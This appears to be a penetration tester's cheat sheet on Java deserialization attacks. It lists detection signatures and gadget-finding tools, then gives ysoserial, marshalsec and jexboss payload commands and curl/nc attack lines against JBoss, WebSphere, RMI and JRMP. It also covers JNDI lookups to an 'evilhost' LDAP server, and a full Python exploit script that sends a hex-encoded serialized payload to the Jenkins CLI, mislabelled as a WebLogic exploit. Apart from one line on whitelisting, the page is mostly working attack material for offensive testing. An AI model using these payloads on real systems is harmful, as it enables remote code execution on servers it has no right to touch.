Link to this headingJava Deserialization

Java Unmarshaller Security

In debpth blog post into the WebLogic, WebSphere, JBoss, Jenkins, OpenNMS Exploits
Java Deserialization Cheat Sheet
Encoding Payloads to exfil data

Detecting Java Serialization:

  • Hex data begins with AC ED 00 05
  • Base64 data begins with rO0AB
  • Content Type is application/x-java-serialized-object
  • gzip data begins with H4sIAAAAAAAAAJ

Where Serialization is Used:

  • In HTTP requests – Parameters, ViewState, Cookies, you name it.
  • RMI – The extensively used Java RMI protocol is 100% based on serialization
  • RMI over HTTP – Many Java thick client web apps use this – again 100% serialized objects
  • JMX – Again, relies on serialized objects being shot over the wire
  • Custom Protocols – Sending an receiving raw Java objects is the norm – which we’ll see in some of the exploits to come

Link to this headingFinding Gadgets Manually

If these callbacks are used then a deseralized data can used to exploit the server

Callbacks that are called when Deseralize is called:

  • readObject()
  • readExternal()
  • readResolve()
  • readObjectNoData()
  • validateObject()
  • finalize()

Link to this headingFind Java Classes with GadgetProbe

https://github.com/BishopFox/GadgetProbe

Link to this headingFind Gadget Chains with Gadget Inspector

Finding Chains in Android files:

>>> java -Xmx2G -jar /opt/Hacking/Web/gadget-inspector-all.jar ./edge-dex2jar.jar >>> cat gadget-chains.txt org/apache/log4j/pattern/LogEvent.readObject(Ljava/io/ObjectInputStream;)V (1) org/apache/log4j/pattern/LogEvent.readLevel(Ljava/io/ObjectInputStream;)V (1) java/lang/reflect/Method.invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; (0) org/apache/log4j/spi/LoggingEvent.readObject(Ljava/io/ObjectInputStream;)V (1) org/apache/log4j/spi/LoggingEvent.readLevel(Ljava/io/ObjectInputStream;)V (1) java/lang/reflect/Method.invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; (0)

Link to this headingFind Jars in ClassPath with EnumJavaLibs

https://github.com/redtimmy/EnumJavaLibs

./getPopularJars.py 20 | while read x; do wget --quiet -P ~/.serially/jars $x; sleep 5; done

Link to this headingHow to Fix

Look-Ahead Checks: use a whitelist to validate the classes that can be deseralized

Link to this headingBypasses

SeralKillerBypassGadgetCollection

Link to this headingPayloads

Link to this headingGenerating Payloads with yoserial

Download the jar file here

Examples:

java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd 0000000: aced 0005 7372 0032 7375 6e2e 7265 666c ....sr.2sun.refl 0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41 ect.annotation.A 0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174 nnotationInvocat ... 0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76 vr..java.lang.Ov 0000560: 6572 7269 6465 0000 0000 0000 0000 0000 erride.......... 0000570: 0078 7071 007e 003a .xpq.~.: java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin nc 10.10.10.10 1099 < groovypayload.bin java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe java -jar ysoserial.jar URLDNS https://test.example.com

Link to this headingGenerating Payloads with marshalsec

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.BlazeDSAMF0 -a java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.BlazeDSAMF3 -a java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.BlazeDSAMFX -a java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian -a java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Burlap -a java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Castor -a java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Java -a java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.JsonIO -a java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.JYAML -a java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Kryo -a java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.KryoAltStrategy -a java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Red5AMF0 -a java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Red5AMF3 -a java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.SnakeYAML -a java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.XStream -a java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.YAMLBeans -a

Link to this headingGenerating Payloads with jexboss

Java Deserialization Exploitation Tool

DNS Lookup Example:

python2 jexboss.py -u http://vulnerable_java_app/path --gadget dns --dns random.burpdomain.com

Jenkins Exploit using JexBoss:

python2 jexboss.py -u http://vulnerable_java_app/jenkins --jenkins

Apache Struts2 Vulnerabilities (CVE-2017-5638)

python2 jexboss.py -u http://vulnerable_java_app/path.action --struts2

Link to this headingExploiting JBoss

Paths to Check:

  • /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo
  • /web-console/ServerInfo.jsp
  • /invoker/JMXInvokerServlet
  • /invoker/readonly
  • /invoker/
  • /
  • /admin-console/

Jboss Exploit Example:

java -jar /opt/Hacking/Web/ysoserial-master-30099844c6-1.jar CommonsCollections1 id | curl -H "Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue" --data-binary @- -X POST -vvv http://test.com:8080/invoker/JMXInvokerServlet

Link to this headingRemote Class Loading Exploit

Create Payload:

java -jar ysoserial.jar C3P0 http://127.0.0.1:8080/:ExportObject > payload.bin

Setup Server:

>>> git clone https://github.com/sciccone/evil-remote-classloader >>> java -jar evil-remote-classloader/output.jar -l 127.0.0.1 -p 8080 -c "id>/tmp/rce" [+] Remote classloader configured. [+] Listening on http:127.0.0.1:8080 - Class name: ExportObject

Link to this headingJNDI Lookup Exploitation

Create Payload:

java -jar ysoserial.jar SpringJta "ldap://evilhost:1389/ExportObject" > payload.bin

Setup Server:

>>> git clone https://github.com/sciccone/evil-ldap-service >>> java -jar evil-remote-classloader/output.jar -l 127.0.0.1 -lp 1389 -p 8080 -c "id>/tmp/rce"

Link to this headingDNS Resolution Exploitation

Create Payload:

java -jar ysoserial.jar URLDNS "http://<random>.burp.example.com" > payload.bin

Get Classes to use:
GadgetProbe

Link to this headingJRMPClient Exploitation

Create Payload:

java -jar ysoserial.jar JRMPClient 127.0.0.1:9090 > payload.bin

Setup Server:

java -jar ysoserial.jar ysoserial.exploit.JRMPListener 9090 CommonsCollections4 "id>/tmp/rce"

NOTE: If retrieve error simular error then its blocked in the running JDK.

Mar 09, 2020 5:58:50 PM java.io.ObjectInputStream filterCheck INFO: ObjectInputFilter REJECTED: class java.util.PriorityQueue, array length: -1, nRefs: 2, depth: 1, bytes: 124, ex: n/a

Link to this headingWeb Logic Exploit

#!/usr/bin/python #usage: ./jenkins.py URL /path/to/payload from urllib.parse import urlparse import socket, sys, requests import base64 url = urlparse(sys.argv[1]) payload_file = sys.argv[2] #Query Jenkins over HTTP to find what port the CLI listener is on r = requests.get("{scheme}://{netloc}".format(url**)) cli_port = int(r.headers['X-Jenkins-CLI-Port']) #Open a socket to the CLI port sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_address = (url.netloc, cli_port) print(f"Connecting to {url.netloc} port {cli_port}") sock.connect(server_address) # Send headers headers=b'\x00\x14Protocol:CLI-connect' print(f'Sending "{headers}"') sock.send(headers) data = sock.recv(1024) #print(sys.stderr, 'received "%s"' % data) data = sock.recv(1024) #print(sys.stderr, 'received "%s"' % data) payloadObj = open(sys.argv[3],'rb').read() payload_b64 = base64.b64encode(payloadObj) payload = b"<===[JENKINS REMOTING CAPACITY]===>" payload += payload_b64 payload += bytes.fromhex("00000000112daced00057372001b687564736f6e2e72656d6f74696e672e557365725265717565737400000000000000010200034c0010636c6173734c6f6164657250726f78797400304c687564736f6e2f72656d6f74696e672f52656d6f7465436c6173734c6f616465722449436c6173734c6f616465723b5b0007726571756573747400025b424c0008746f537472696e677400124c6a6176612f6c616e672f537472696e673b78720017687564736f6e2e72656d6f74696e672e52657175657374000000000000000102000349000269644900086c617374496f49644c0008726573706f6e736574001a4c687564736f6e2f72656d6f74696e672f526573706f6e73653b78720017687564736f6e2e72656d6f74696e672e436f6d6d616e6400000000000000010200014c00096372656174656441747400154c6a6176612f6c616e672f457863657074696f6e3b78707372001e687564736f6e2e72656d6f74696e672e436f6d6d616e6424536f7572636500000000000000010200014c00067468697324307400194c687564736f6e2f72656d6f74696e672f436f6d6d616e643b787200136a6176612e6c616e672e457863657074696f6ed0fd1f3e1a3b1cc4020000787200136a6176612e6c616e672e5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d65737361676571007e00035b000a737461636b547261636574001e5b4c6a6176612f6c616e672f537461636b5472616365456c656d656e743b4c001473757070726573736564457863657074696f6e737400104c6a6176612f7574696c2f4c6973743b787071007e0010707572001e5b4c6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c3cfd223902000078700000000c7372001b6a6176612e6c616e672e537461636b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e756d6265724c000e6465636c6172696e67436c61737371007e00034c000866696c654e616d6571007e00034c000a6d6574686f644e616d6571007e0003787000000043740017687564736f6e2e72656d6f74696e672e436f6d6d616e6474000c436f6d6d616e642e6a6176617400063c696e69743e7371007e00130000003271007e001571007e001671007e00177371007e001300000063740017687564736f6e2e72656d6f74696e672e5265717565737474000c526571756573742e6a61766171007e00177371007e00130000003c74001b687564736f6e2e72656d6f74696e672e557365725265717565737474001055736572526571756573742e6a61766171007e00177371007e001300000308740017687564736f6e2e72656d6f74696e672e4368616e6e656c74000c4368616e6e656c2e6a61766174000463616c6c7371007e0013000000fa740027687564736f6e2e72656d6f74696e672e52656d6f7465496e766f636174696f6e48616e646c657274001c52656d6f7465496e766f636174696f6e48616e646c65722e6a617661740006696e766f6b657371007e0013ffffffff740017687564736f6e2e72656d6f74696e672e2450726f7879317074000f77616974466f7250726f70657274797371007e0013000004e771007e002071007e002174001577616974466f7252656d6f746550726f70657274797371007e00130000009374000e687564736f6e2e636c692e434c49740008434c492e6a61766171007e00177371007e00130000004874001f687564736f6e2e636c692e434c49436f6e6e656374696f6e466163746f7279740019434c49436f6e6e656374696f6e466163746f72792e6a617661740007636f6e6e6563747371007e0013000001df71007e002d71007e002e7400055f6d61696e7371007e00130000018671007e002d71007e002e7400046d61696e737200266a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c697374fc0f2531b5ec8e100200014c00046c69737471007e000f7872002c6a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c65436f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a6176612f7574696c2f436f6c6c656374696f6e3b7870737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a657870000000007704000000007871007e003c7871007e0008000000010000000070737d00000002002e687564736f6e2e72656d6f74696e672e52656d6f7465436c6173734c6f616465722449436c6173734c6f61646572001c687564736f6e2e72656d6f74696e672e49526561645265736f6c7665787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b787073720027687564736f6e2e72656d6f74696e672e52656d6f7465496e766f636174696f6e48616e646c657200000000000000010300055a00146175746f556e6578706f7274427943616c6c65725a0009676f696e67486f6d654900036f69645a00097573657250726f78794c00066f726967696e71007e000d7870000000000002007371007e000b71007e004374007850726f787920687564736f6e2e72656d6f74696e672e52656d6f7465496e766f636174696f6e48616e646c6572403220776173206372656174656420666f7220696e7465726661636520687564736f6e2e72656d6f74696e672e52656d6f7465436c6173734c6f616465722449436c6173734c6f616465727571007e00110000000d7371007e00130000007d71007e002471007e002571007e00177371007e00130000008971007e002471007e0025740004777261707371007e00130000026a71007e002071007e00217400066578706f72747371007e0013000002a6740021687564736f6e2e72656d6f74696e672e52656d6f7465436c6173734c6f6164657274001652656d6f7465436c6173734c6f616465722e6a61766171007e004a7371007e00130000004671007e001d71007e001e71007e00177371007e00130000030871007e002071007e002171007e00227371007e0013000000fa71007e002471007e002571007e00267371007e0013ffffffff71007e00287071007e00297371007e0013000004e771007e002071007e002171007e002b7371007e00130000009371007e002d71007e002e71007e00177371007e00130000004871007e003071007e003171007e00327371007e0013000001df71007e002d71007e002e71007e00347371007e00130000018671007e002d71007e002e71007e003671007e003a7878757200025b42acf317f8060854e0020000787000000746aced000573720032687564736f6e2e72656d6f74696e672e52656d6f7465496e766f636174696f6e48616e646c6572245250435265717565737400000000000000010200044900036f69645b0009617267756d656e74737400135b4c6a6176612f6c616e672f4f626a6563743b4c000a6d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000574797065737400135b4c6a6176612f6c616e672f537472696e673b7708fffffffe0000000278720017687564736f6e2e72656d6f74696e672e52657175657374000000000000000102000349000269644900086c617374496f49644c0008726573706f6e736574001a4c687564736f6e2f72656d6f74696e672f526573706f6e73653b77040000000078720017687564736f6e2e72656d6f74696e672e436f6d6d616e6400000000000000010200014c00096372656174656441747400154c6a6176612f6c616e672f457863657074696f6e3b77040000000078707372001e687564736f6e2e72656d6f74696e672e436f6d6d616e6424536f7572636500000000000000010200014c00067468697324307400194c687564736f6e2f72656d6f74696e672f436f6d6d616e643b770400000000787200136a6176612e6c616e672e457863657074696f6ed0fd1f3e1a3b1cc40200007704fffffffd787200136a6176612e6c616e672e5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d65737361676571007e00025b000a737461636b547261636574001e5b4c6a6176612f6c616e672f537461636b5472616365456c656d656e743b4c001473757070726573736564457863657074696f6e737400104c6a6176612f7574696c2f4c6973743b7704fffffffd787071007e0010707572001e5b4c6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c3cfd22390200007704fffffffd78700000000b7372001b6a6176612e6c616e672e537461636b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e756d6265724c000e6465636c6172696e67436c61737371007e00024c000866696c654e616d6571007e00024c000a6d6574686f644e616d6571007e00027704fffffffd787000000043740017687564736f6e2e72656d6f74696e672e436f6d6d616e6474000c436f6d6d616e642e6a6176617400063c696e69743e7371007e00130000003271007e001571007e001671007e00177371007e001300000063740017687564736f6e2e72656d6f74696e672e5265717565737474000c526571756573742e6a61766171007e00177371007e001300000239740032687564736f6e2e72656d6f74696e672e52656d6f7465496e766f636174696f6e48616e646c6572245250435265717565737474001c52656d6f7465496e766f636174696f6e48616e646c65722e6a61766171007e00177371007e0013000000f6740027687564736f6e2e72656d6f74696e672e52656d6f7465496e766f636174696f6e48616e646c657271007e001e740006696e766f6b657371007e0013ffffffff740017687564736f6e2e72656d6f74696e672e2450726f7879317074000f77616974466f7250726f70657274797371007e0013000004e7740017687564736f6e2e72656d6f74696e672e4368616e6e656c74000c4368616e6e656c2e6a61766174001577616974466f7252656d6f746550726f70657274797371007e00130000009374000e687564736f6e2e636c692e434c49740008434c492e6a61766171007e00177371007e00130000004874001f687564736f6e2e636c692e434c49436f6e6e656374696f6e466163746f7279740019434c49436f6e6e656374696f6e466163746f72792e6a617661740007636f6e6e6563747371007e0013000001df71007e002a71007e002b7400055f6d61696e7371007e00130000018671007e002a71007e002b7400046d61696e737200266a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c697374fc0f2531b5ec8e100200014c00046c69737471007e000f7704fffffffd7872002c6a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c65436f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a6176612f7574696c2f436f6c6c656374696f6e3b7704fffffffd7870737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a657704fffffffd7870000000007704000000007871007e00397871007e000800000000000000007000000001757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007704fffffffd787000000001740018687564736f6e2e636c692e436c69456e747279506f696e7471007e0024757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b470200007704fffffffd7870000000017400106a6176612e6c616e672e4f626a65637474001d5250435265717565737428312c77616974466f7250726f706572747929") print('sending payload...') '''outf = open('payload.tmp','w') outf.write(payload) outf.close()''' sock.send(payload)

Link to this headingWebsphere-Soap-Exploit

Example Request:

echo -e "<?xml version='1.0' encoding='UTF-8'?>\n <SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\n<SOAP-ENV:Header xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"8.5.5.1\" ns0:JMXMessageVersion=\"1.2.0\" ns0:SecurityEnabled=\"true\" ns0:JMXVersion=\"1.2.0\">\n<LoginMethod>BasicAuth</LoginMethod>\n</SOAP-ENV:Header>\n<SOAP-ENV:Body>\n<ns1:getAttribute xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n<objectname xsi:type=\"ns1:javax.management.ObjectName\">$(java -jar /opt/Hacking/Web/ysoserial-master-30099844c6-1.jar CommonsCollections1 id | base64)</objectname>\n<attribute xsi:type=\"xsd:string\">ringBufferSize</attribute>\n</ns1:getAttribute>\n</SOAP-ENV:Body>\n</SOAP-ENV:Envelope>" | curl -H "Content-Type: text/xml; charset=utf-8" -H 'SOAPAction: "urn:AdminService"' --data-binary @- -X POST -vvv https://test.com:8880/

Link to this headingRMI Exploiting

Introduction to Java RMI with examples
- https://www.geeksforgeeks.org/remote-method-invocation-in-java/
- https://mkyong.com/java/java-rmi-distributed-objects-example/
Very well written researches on how to attack Java RMI
- https://mogwailabs.de/blog/2019/04/attacking-rmi-based-jmx-services/
- https://mogwailabs.de/blog/2019/03/attacking-java-rmi-services-after-jep-290/
- https://i.blackhat.com/eu-19/Wednesday/eu-19-An-Far-Sides-Of-Java-Remote-Protocols.pdf
Latest bypass gadget for the RMI registry whitelist (fixed in JKD8u241)
- https://mogwailabs.de/blog/2020/02/an-trinhs-rmi-registry-bypass/
- https://www.youtube.com/watch?v=tj6MdgfjQTU

Enumerate Classes with BaRMIe:

java -jar BaRMIe_v1.01.jar -enum 10.0.0.1 1099

Attack Service:

java -jar BaRMIe_v1.01.jar -attack 10.0.0.1 1099

Attack RMI with yososerial:

java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit 10.0.0.1 1099 CommonsBeanutils1 "touch /tmp/rce"

Attack JRMP with yososerial:

java -cp ysoserial.jar ysoserial.exploit.JRMPClient 10.0.0.1 1099 CommonsBeanutils1 "touch /tmp/rce"

Link to this headingJMX Exploitation

https://github.com/mogwailabs/mjet

Link to this headingJMS Exploitation

https://github.com/matthiaskaiser/jmet

Link to this headingAMQP Exploitation

Link to this headingXMLEncoder (XML)

Link to this headingXStream (XML/JSON/various)

Link to this headingKryo (binary)

Link to this headingHessian/Burlap (binary/XML)

Link to this headingCastor (XML)

Link to this headingjson-io (JSON)

Link to this headingJackson (JSON)

Link to this headingFastjson (JSON)

Link to this headingGenson (JSON)

Link to this headingRed5 IO AMF (AMF)

Link to this headingApache Flex BlazeDS (AMF)

Link to this headingFlamingo AMF (AMF)

Link to this headingGraniteDS (AMF)

Link to this headingWebORB for Java (AMF)

Link to this headingSnakeYAML (YAML)

Link to this headingjYAML (YAML)

Link to this headingYamlBeans (YAML)

Link to this heading“Safe” deserialization

Link to this headingJMX

siberas JMX exploitation toolkit